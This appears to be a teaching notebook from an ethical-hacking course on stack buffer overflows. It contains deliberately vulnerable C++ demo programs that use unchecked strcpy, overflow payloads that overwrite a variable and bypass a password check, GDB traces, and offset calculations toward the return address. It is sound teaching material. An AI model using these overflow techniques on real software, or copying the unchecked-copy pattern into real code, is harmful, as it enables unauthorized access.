## Stack Overflow

- a buffer overrun in the stack segment: data written past the end of a stack-allocated buffer spills into adjacent stack memory

## Stack overflow consequences

- stack overflow can violate all 3 CIA (Confidentiality, Integrity, and Availability) security principles

1. overwrite variable(s) with the data of your choice (Integrity)
2. change the flow of the program execution (Integrity)
3. remote code execution (Confidentiality, Integrity, Availability)

- let's look at the first two impacts of stack overflow in this notebook

### Memory corruption

- overwrite data in memory
- violates data integrity
- can overwrite variables with the data of your choice on the stack

- let's use some demo programs to demonstrate various consequences of stack overflow

In [None]:
# let's demonstrate this
! cat ../demos/stack_overflow/memory_corruption.cpp

In [None]:
%%bash
input="../demos/stack_overflow/memory_corruption.cpp"
output="memory_corruption.exe"
echo kali | sudo -S ../demos/compile.sh $input $output

In [None]:
! ./memory_corruption.exe 
# segfault is bad!! provide some argument
# the segfault message doesn't show up in the Jupyter notebook, but you can see it in a terminal

In [None]:
# run the program providing some argument
! ./memory_corruption.exe hello
# notice the addresses of variables are shifted

In [None]:
# try some other values, such as 15 As
! ./memory_corruption.exe $(python3 -c 'print("A"*15)')
# observe the values of buffer_two and buffer_one, and num

In [None]:
# try 16 As
! ./memory_corruption.exe  $(python3 -c 'print("A"*16, end="")')
# observe the values of buffer_two and buffer_one, and num
# num is 0: the string's terminating NUL byte (ASCII value 0) spilled into num

- try to overwrite the num variable with "BCDE"
- how many bytes is num away from buffer_two? What's the offset of num with respect to buffer_two?
- find the difference between the address of num and the address of buffer_two

In [None]:
# subtract the address of buffer_two from the address of num
# (use the addresses printed by your own run; the ones below are only an example)
# which variable is at the higher address?
print(0xffffc414 - 0xffffc40c)

In [None]:
# we know that 16 bytes is the offset! any longer text will modify the num variable
# try 16As+"BCDE" and notice the value of num
! ./memory_corruption.exe $(python3 -c 'print("A"*16 + "BCDE", end="")')
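
The overwrite of `num` can also be reproduced in a small model. The following is a sketch in Python, not the demo program itself. It assumes a frame with two 8-byte buffers (`buffer_two` at the lowest address, then `buffer_one`) followed by a 4-byte little-endian `num` that starts at 5. These sizes and the initial value are assumptions chosen to give the 16-byte offset used in this section, and `unchecked_copy` and `num_after` are hypothetical helper names.

```python
import struct

# Hypothetical frame layout (an assumption, not read from the demo binary):
#   offset  0..7   buffer_two
#   offset  8..15  buffer_one
#   offset 16..19  num (4-byte little-endian int)
#   offset 20..23  spare bytes standing in for whatever lies above num
BUFFER_TWO, BUFFER_ONE, NUM, FRAME_SIZE = 0, 8, 16, 24


def unchecked_copy(frame: bytearray, dest: int, data: bytes) -> None:
    """Copy data plus a NUL terminator into frame at dest; no check against the buffer size."""
    payload = data + b"\x00"
    if dest + len(payload) > len(frame):
        raise ValueError("payload runs past the modeled frame")
    frame[dest:dest + len(payload)] = payload


def num_after(arg: bytes) -> int:
    """Return the value of num after arg is copied into buffer_two."""
    frame = bytearray(FRAME_SIZE)
    struct.pack_into("<i", frame, NUM, 5)  # assumed initial value of num
    unchecked_copy(frame, BUFFER_TWO, arg)
    return struct.unpack_from("<i", frame, NUM)[0]


for arg in (b"hello", b"A" * 15, b"A" * 16, b"A" * 16 + b"BCDE"):
    print(f"{len(arg):2d} bytes -> num = {num_after(arg):#x}")
```

In this model, 16 As leave only the terminating NUL in `num`, so it reads 0, while four extra bytes replace `num` entirely.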

In [None]:
# check the hex values with python; also see the values of buffer_two and buffer_one
chr(int('42', 16))
# B is stored at the end!

In [None]:
# or find the ASCII code of B (ord returns decimal: 66 == 0x42)
ord('B')

In [None]:
# let's check that 0x45444342 is hex representation of 'BCDE' in reverse order
print(''.join(["{:02x}".format(ord(c)) for c in 'BCDE']))

### Recall x86 stores integers in little-endian!
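
The byte order can be checked directly in Python. This is a short sketch using only the standard library; it interprets the same four bytes both ways and then packs integers back into the bytes that would sit in memory on a little-endian machine.

```python
import struct

text = b"BCDE"  # bytes 0x42 0x43 0x44 0x45, in memory order

# Interpret the four bytes as an integer in each byte order.
as_little = int.from_bytes(text, "little")
as_big = int.from_bytes(text, "big")
print(hex(as_little))  # 0x45444342
print(hex(as_big))     # 0x42434445

# The reverse direction: integer -> bytes as stored in little-endian memory.
print(struct.pack("<I", 0x45444342))  # b'BCDE'
print(struct.pack("<I", 0x42434445))  # b'EDCB'
```

So for the integer to read `0x42434445`, the bytes have to be sent as `EDCB`.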

In [None]:
# now try overwriting num with BCDE in the right order
! ./memory_corruption.exe $(python3 -c 'print("A"*16 + "EDCB")')
# check if BCDE is in that order...
# remember x86 is little-endian, i.e., least significant byte is stored first

In [None]:
# can directly send hex values of EDCB
! ./memory_corruption.exe  $(python3 -c 'print("A"*16 + "\x45\x44\x43\x42")')

In [None]:
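# a much longer payload overruns far past num and will likely crash the program
# python3's print() would encode "\xff" as UTF-8 (two bytes), so write raw bytes instead
! ./memory_corruption.exe $(python3 -c 'import sys; sys.stdout.buffer.write(b"A"*110000 + b"\x1c\xc3\xff\xff")')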
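
Payloads with bytes above `0x7f` need some care in Python 3, because a `str` is encoded on output while a `bytes` object is written unchanged. The sketch below compares the two, assuming UTF-8 as the output encoding (the common default). `build_payload` is a hypothetical helper name, not part of the demo code.

```python
import struct

# A str is encoded when printed; under UTF-8 each character above 0x7f becomes two bytes.
as_text = "\x1c\xc3\xff\xff".encode("utf-8")
print(as_text, len(as_text))

# A bytes object keeps exactly the four bytes that were written.
as_bytes = b"\x1c\xc3\xff\xff"
print(as_bytes, len(as_bytes))


def build_payload(padding: int, value: int) -> bytes:
    """Hypothetical helper: padding bytes followed by a 4-byte little-endian value."""
    return b"A" * padding + struct.pack("<I", value)


payload = build_payload(16, 0xFFFFC31C)
print(payload[-4:])
```

From a shell, raw bytes can be emitted with `sys.stdout.buffer.write(...)` instead of `print(...)`.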

### draw stack of main( ) and answer the following questions
- what is the order of the variables pushed?
- when argv[1] is copied to buffer_two, what may happen to other variables?
- what caused the memory corruption?
- compile and run the program with some arguments

### Change the flow of the program execution
- a buffer overflow can change the flow of program execution, especially if the program's decisions rely on variables stored on the stack
- violates the integrity of the program itself
- use ./demos/stack_overflow/authenticate.cpp program to demonstrate the impact

In [8]:
! cat ../demos/stack_overflow/authenticate.cpp

#include <cstring>
#include <iostream>
#include <cstdlib>

using namespace std;

int check_authentication(char *password) {
    int auth_flag = 0;
    char password_buffer[16];

    strcpy(password_buffer, password);

    if(strcmp(password_buffer, "brillig") == 0)
        auth_flag = 1;
    if(strcmp(password_buffer, "outgrabe") == 0)
        auth_flag = 1;

    return auth_flag;
}

int main(int argc, char *argv[]) {
    if(argc < 2) {
        cout << "Usage: " << argv[0] << " password\n";
        exit(0);
    }
    if(check_authentication(argv[1])) {
        cout << "\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n";
        cout << "      Access Granted.\n";
        cout << "-=-=-=-=-=-=-=-=-=-=-=-=-=-\n";
    } 
    else
        cout << "\nAccess Denied.\n";
    return 0;
}
	


In [2]:
%%bash
# let's compile the program
input="../demos/stack_overflow/authenticate.cpp"
output="authenticate.exe"
#echo kali | sudo -S ../demos/compile.sh $input $output
g++ -m32 -o $output $input

In [3]:
# run the program; gives help on how to run it properly
! ./authenticate.exe

Usage: ./authenticate.exe password


In [4]:
# authenticate with hard-coded password: outgrabe
! ./authenticate.exe outgrabe


-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-


In [6]:
# authenticate with hardcoded password: brillig
! ./authenticate.exe brillig


-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-


In [7]:
# any other password shouldn't work!
! ./authenticate.exe ard


Access Denied.


### authenticate without correct password

In [9]:
# since password_buffer is 16 bytes, let's provide 16 As as password
! ./authenticate.exe $(python -c 'print("A"*16)')


Access Denied.


In [10]:
# how about 17 As?
! ./authenticate.exe $(python -c 'print("A"*17)')


-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-


### TODO
- draw stack of check_authentication( ) 
- explain why 17As lets you in!

### verify with gdb-peda
- run the program in GDB to see the address of auth_flag relative to that of password_buffer
- peda will show address of both password_buffer and auth_flag in stack context
- observe the value of auth_flag; any int value other than 0 is treated as true!
- make sure PEDA (Python Exploit Development Assistance) is installed (see [GDB Peda Notebook](./GDB-Peda.ipynb))

- load authenticate.exe into gdb

```bash
┌──(kali㉿K)-[~/EthicalHacking]
└─$ gdb -q authenticate.exe
Reading symbols from authenticate.exe...
```

- set a breakpoint at the check_authentication function
```bash
gdb-peda$ break check_authentication
Breakpoint 1 at 0x80491c4: file demos/stack_overflow/authenticate.cpp, line 7.
```

- run the program with 17 A's as argument

```bash
gdb-peda$ run $(python3 -c 'print("A"*17)')
Starting program: /home/kali/EthicalHacking/authenticate.exe $(python3 -c 'print("A"*17)')
[----------------------------------registers-----------------------------------]
EAX: 0xffffc6d0 ('A' <repeats 17 times>)
EBX: 0x804c000 --> 0x804bf04 --> 0x1 
ECX: 0xffffc3b0 --> 0x2 
EDX: 0xffffc3e4 --> 0x0 
ESI: 0xffffc3b0 --> 0x2 
EDI: 0xf7de6000 --> 0x1e4d6c 
EBP: 0xffffc368 --> 0xffffc398 --> 0x0 
ESP: 0xffffc340 --> 0xf7e81ae0 (<_ZNSt8ios_base4InitD2Ev>:      push   ebp)
EIP: 0x80491c4 (<_Z20check_authenticationPc+18>:        mov    DWORD PTR [ebp-0xc],0x0)
EFLAGS: 0x216 (carry PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80491b6 <_Z20check_authenticationPc+4>:    sub    esp,0x24
   0x80491b9 <_Z20check_authenticationPc+7>:    call   0x80490f0 <__x86.get_pc_thunk.bx>                             
   0x80491be <_Z20check_authenticationPc+12>:   add    ebx,0x2e42                                                    
=> 0x80491c4 <_Z20check_authenticationPc+18>:   mov    DWORD PTR [ebp-0xc],0x0                                       
   0x80491cb <_Z20check_authenticationPc+25>:   sub    esp,0x8                                                       
   0x80491ce <_Z20check_authenticationPc+28>:   push   DWORD PTR [ebp+0x8]                                           
   0x80491d1 <_Z20check_authenticationPc+31>:   lea    eax,[ebp-0x1c]                                                
   0x80491d4 <_Z20check_authenticationPc+34>:   push   eax                                                           
[------------------------------------stack-------------------------------------]                                     
0000| 0xffffc340 --> 0xf7e81ae0 (<_ZNSt8ios_base4InitD2Ev>:     push   ebp)
0004| 0xffffc344 --> 0x804c031 --> 0x0 
0008| 0xffffc348 --> 0x804c02c --> 0x0 
0012| 0xffffc34c --> 0x8049333 (<__static_initialization_and_destruction_0(int, int)+12>:       add    ebx,0x2ccd)
0016| 0xffffc350 --> 0x0 
0020| 0xffffc354 --> 0x2 
0024| 0xffffc358 --> 0xffffc378 --> 0x804c000 --> 0x804bf04 --> 0x1 
0028| 0xffffc35c --> 0x804939f (<_GLOBAL__sub_I__Z20check_authenticationPc()+31>:       add    esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, check_authentication (password=0xffffc6d0 'A' <repeats 17 times>)
    at demos/stack_overflow/authenticate.cpp:7
7           int auth_flag = 0;
```

- step through the code and stop after strcpy(password_buffer, password);
- entering the `next` command twice will do it

```bash
gdb-peda$ n

gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffffc34c ('A' <repeats 17 times>)
EBX: 0x804c000 --> 0x804bf04 --> 0x1 
ECX: 0xffffc6e0 --> 0x4f430041 ('A')
EDX: 0xffffc35c --> 0x41 ('A')
ESI: 0xffffc3b0 --> 0x2 
EDI: 0xf7de6000 --> 0x1e4d6c 
EBP: 0xffffc368 --> 0xffffc398 --> 0x0 
ESP: 0xffffc340 --> 0xf7e81ae0 (<_ZNSt8ios_base4InitD2Ev>:      push   ebp)
EIP: 0x80491dd (<_Z20check_authenticationPc+43>:        sub    esp,0x8)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80491d4 <_Z20check_authenticationPc+34>:   push   eax
   0x80491d5 <_Z20check_authenticationPc+35>:   call   0x8049090 <strcpy@plt>
   0x80491da <_Z20check_authenticationPc+40>:   add    esp,0x10
=> 0x80491dd <_Z20check_authenticationPc+43>:   sub    esp,0x8
   0x80491e0 <_Z20check_authenticationPc+46>:   lea    eax,[ebx-0x1ff7]
   0x80491e6 <_Z20check_authenticationPc+52>:   push   eax
   0x80491e7 <_Z20check_authenticationPc+53>:   lea    eax,[ebp-0x1c]
   0x80491ea <_Z20check_authenticationPc+56>:   push   eax
[------------------------------------stack-------------------------------------]
0000| 0xffffc340 --> 0xf7e81ae0 (<_ZNSt8ios_base4InitD2Ev>:     push   ebp)
0004| 0xffffc344 --> 0x804c031 --> 0x0 
0008| 0xffffc348 --> 0x804c02c --> 0x0 
0012| 0xffffc34c ('A' <repeats 17 times>)
0016| 0xffffc350 ('A' <repeats 13 times>)
0020| 0xffffc354 ("AAAAAAAAA")
0024| 0xffffc358 ("AAAAA")
0028| 0xffffc35c --> 0x41 ('A')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
12          if(strcmp(password_buffer, "brillig") == 0)
```

- now that the password is copied to password_buffer, let's see the values of a couple of stack variables

```bash
gdb-peda$ p/s password_buffer 
$1 = 'A' <repeats 16 times>

gdb-peda$ p/d auth_flag
$2 = 65
```

- why was auth_flag overwritten?
- let's print the addresses of these variables to answer it

```bash
gdb-peda$ p &password_buffer 
$3 = (char (*)[16]) 0xffffc34c

gdb-peda$ p &auth_flag
$4 = (int *) 0xffffc35c
```

- auth_flag is at a higher address than password_buffer
- let's subtract the address of password_buffer from the address of auth_flag to find the difference; a positive result means auth_flag is at the higher address

In [None]:
print(0xffffc35c - 0xffffc34c)
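
The 16-byte gap explains the 16 vs. 17 As result. The sketch below models only the two locals with `ctypes`, laid out as in the GDB session above (`password_buffer` first, `auth_flag` 16 bytes higher). It is an illustration rather than the real program: it skips the `strcmp` checks, and `Frame` and `auth_flag_after` are hypothetical names.

```python
import ctypes


class Frame(ctypes.Structure):
    """Two locals laid out as in the GDB session: buffer first, flag 16 bytes above it."""
    _fields_ = [
        ("password_buffer", ctypes.c_char * 16),
        ("auth_flag", ctypes.c_int32),
    ]


def auth_flag_after(password: bytes) -> int:
    """Copy password plus its NUL terminator to the start of the frame, with no size check against the buffer."""
    frame = Frame()  # zero-initialised, so auth_flag starts at 0
    data = password + b"\x00"
    if len(data) > ctypes.sizeof(frame):
        raise ValueError("payload would leave the modeled frame")
    ctypes.memmove(ctypes.addressof(frame), data, len(data))
    return frame.auth_flag


for n in (15, 16, 17):
    flag = auth_flag_after(b"A" * n)
    print(n, flag, "Access Granted" if flag else "Access Denied")
```

With 16 As only the NUL terminator lands in `auth_flag`, so it stays 0. The 17th A puts a nonzero byte there (0x41, i.e. 65 on a little-endian host), and any nonzero value counts as true.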

### variables declaration order

- can you still overflow if the order of the variable declarations is switched?
- normally, variables are pushed on the stack in the order they are declared, from top to bottom of the source
    - the variable declared last is pushed last and ends up on top of the stack

### TODO

- let's look at an example program demos/stack_overflow/authenticate2.cpp

- draw stack
- verify it using GDB

In [16]:
! cat ../demos/stack_overflow/authenticate2.cpp

#include <cstring>
#include <iostream>
#include <cstdlib>

using namespace std;

bool check_authentication(char *password) {
    char password_buffer[16];
    bool auth_flag = false;

    strcpy(password_buffer, password);

    if(strcmp(password_buffer, "brillig") == 0)
        auth_flag = true;
    if(strcmp(password_buffer, "outgrabe") == 0)
        auth_flag = true;

    return auth_flag;
}

int main(int argc, char *argv[]) {
    if(argc < 2) {
        cout << "Usage: " << argv[0] << " password\n";
        exit(0);
    }
    if(check_authentication(argv[1])) {
        cout << "\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n";
        cout << "      Access Granted.\n";
        cout << "-=-=-=-=-=-=-=-=-=-=-=-=-=-\n";
    } 
    else
        cout << "\nAccess Denied.\n";
    return 0;
}
	


In [17]:
%%bash
# let's compile the program
input="../demos/stack_overflow/authenticate2.cpp"
output="authenticate2.exe"
echo kali | sudo -S ../demos/compile.sh $input $output

[sudo] password for kali: 

In [18]:
# run the program with 17As
! ./authenticate2.exe $(python3 -c 'print("A"*17, end="")')


-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-


### How is it possible?

- see in gdb where `auth_flag` is relative to `password_buffer`
- `auth_flag` must still be at a higher address (pushed before) than `password_buffer`
- one plausible explanation is compiler optimization; the compiler, not the declaration order, decides the final stack layout
- if `auth_flag` is at a lower address than `password_buffer`, you can't overwrite it by overflowing `password_buffer`
    - however, you can still overwrite other parts of memory, including the caller's return address
    - well, let's keep going... :)
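
How far an overflow has to travel can be worked out from frame-relative offsets. The sketch below uses the offsets visible in the GDB disassembly of authenticate.exe earlier in this notebook (`[ebp-0x1c]` for `password_buffer`, `[ebp-0xc]` for `auth_flag`). It assumes the conventional 32-bit x86 frame with the saved EBP at `[ebp]` and the return address at `[ebp+4]`; the prologue is not shown in the excerpt, so treat that as an assumption. Offsets for authenticate2.exe or any other build have to be read from its own disassembly. `bytes_until` is a hypothetical helper name.

```python
# Frame-relative offsets taken from the GDB disassembly of authenticate.exe.
PASSWORD_BUFFER = -0x1C  # lea eax,[ebp-0x1c]
AUTH_FLAG = -0x0C        # mov DWORD PTR [ebp-0xc],0x0
SAVED_EBP = 0x0          # assumed conventional frame: push ebp; mov ebp,esp
RETURN_ADDRESS = 0x4     # assumed: pushed by call, just above the saved EBP


def bytes_until(target: int, buffer: int = PASSWORD_BUFFER) -> int:
    """Number of bytes written from the start of buffer before reaching target."""
    distance = target - buffer
    if distance < 0:
        raise ValueError("target lies below the buffer; an upward overflow cannot reach it")
    return distance


for name, offset in [
    ("auth_flag", AUTH_FLAG),
    ("saved EBP", SAVED_EBP),
    ("return address", RETURN_ADDRESS),
]:
    print(f"{name}: {bytes_until(offset)} bytes")
```

A target placed below the buffer raises an error in this sketch, which mirrors the point that a variable at a lower address is out of reach of this overflow.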